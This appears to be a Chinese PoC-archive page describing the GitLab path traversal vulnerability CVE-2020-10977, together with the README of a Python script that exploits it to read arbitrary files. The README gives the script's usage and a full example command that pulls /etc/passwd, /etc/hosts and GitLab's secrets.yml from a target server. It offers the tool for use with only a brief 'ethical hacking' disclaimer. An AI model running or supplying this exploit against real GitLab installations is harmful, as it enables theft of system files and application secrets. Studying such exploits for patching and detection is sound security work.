关联漏洞
标题:
GitLab 路径遍历漏洞
(CVE-2020-10977)
描述:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
描述
A (wanted to be) better script than what can be found on exploit-db about the authenticated arbitrary read file on GitLab v12.9.0 (CVE-2020-10977)
介绍
## The warn
For demonstration purpose and ethical hacking only.
## The what
A (wanted to be) better script than what can be found on exploit-db about the authenticated arbitrary read file on GitLab v12.9.0 (CVE-2020-10977)
## The how
1. Meet the dependency (you probably already have the rest)
`pip3 install requests python-gitlab`
2. Get an API token using your credentials
[https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html)
3. Profit?
```
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST The https URI to gitlab webroot
-u USER, --user USER The user name
-p PASSWD, --passwd PASSWD
The user password
-t TOKEN, --token TOKEN
The access token
-f FILES, --files FILES
The absolute paths to the files on the Gitlab local system
```
```
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
```
文件快照
[4.0K] /data/pocs/10794da809ea68116819125ee5c30da9c8a05806
├── [4.2K] gitlab-12.9.0-file-read.py
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。